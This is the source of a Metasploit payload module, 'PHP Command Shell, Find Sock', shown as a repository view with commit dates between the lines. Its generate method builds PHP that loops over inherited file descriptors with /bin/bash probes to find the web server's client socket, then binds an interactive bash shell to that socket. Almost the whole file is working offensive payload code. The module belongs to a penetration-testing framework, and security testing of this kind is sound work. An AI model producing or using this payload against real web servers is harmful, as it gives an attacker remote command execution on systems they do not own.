Files
metasploit-gs/modules/payloads/singles/php/shell_findsock.rb
T

88 lines
2.3 KiB
Ruby
Raw Normal View History

##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2013-10-15 13:50:46 -05:00
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/payload/php'
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'
2010-02-24 01:19:59 +00:00
require 'msf/base/sessions/command_shell_options'
require 'msf/core/handler/find_shell'
2016-03-08 14:02:44 +01:00
module MetasploitModule
2015-03-09 15:44:14 -05:00
CachedSize = :dynamic
2013-08-30 16:28:54 -05:00
include Msf::Payload::Single
include Msf::Payload::Php
include Msf::Sessions::CommandShellOptions
2013-08-30 16:28:54 -05:00
def initialize(info = {})
super(merge_info(info,
'Name' => 'PHP Command Shell, Find Sock',
'Description' => %Q{
Spawn a shell on the established connection to
the webserver. Unfortunately, this payload
can leave conspicuous evil-looking entries in the
apache error logs, so it is probably a good idea
to use a bind or reverse shell unless firewalls
prevent them from working. The issue this
payload takes advantage of (CLOEXEC flag not set
on sockets) appears to have been patched on the
Ubuntu version of Apache and may not work on
other Debian-based distributions. Only tested on
Apache but it might work on other web servers
that leak file descriptors to child processes.
},
2014-07-11 12:45:23 -05:00
'Author' => [ 'egypt' ],
2013-08-30 16:28:54 -05:00
'License' => BSD_LICENSE,
'Platform' => 'php',
'Handler' => Msf::Handler::FindShell,
'Session' => Msf::Sessions::CommandShell,
'Arch' => ARCH_PHP
))
end
2013-08-30 16:28:54 -05:00
def php_findsock
2013-08-30 16:28:54 -05:00
var_cmd = '$' + Rex::Text.rand_text_alpha(rand(4) + 6)
var_fd = '$' + Rex::Text.rand_text_alpha(rand(4) + 6)
var_out = '$' + Rex::Text.rand_text_alpha(rand(4) + 6)
shell = <<END_OF_PHP_CODE
2017-02-02 17:57:03 -06:00
#{php_preamble}
print("<html><body>");
flush();
function mysystem(#{var_cmd}){
2017-02-02 17:57:03 -06:00
#{php_system_block(cmd_varname: var_cmd, output_varname: var_out)}
2013-08-30 16:28:54 -05:00
return #{var_out};
}
#{var_fd} = 13;
for ($i = 3; $i < 50; $i++) {
2013-08-30 16:28:54 -05:00
$foo = mysystem("/bin/bash 2>/dev/null <&$i -c 'echo $i'");
if ($foo != $i) {
#{var_fd} = $i - 1;
break;
}
}
print("</body></html>\n\n");
flush();
#{var_cmd} = "/bin/bash <&#{var_fd} >&#{var_fd} 2>&#{var_fd}";
mysystem(#{var_cmd});
END_OF_PHP_CODE
2010-02-24 01:19:59 +00:00
2013-08-30 16:28:54 -05:00
return shell
end
2013-08-30 16:28:54 -05:00
#
# Constructs the payload
#
def generate
return php_findsock
end
2009-02-17 06:04:02 +00:00
end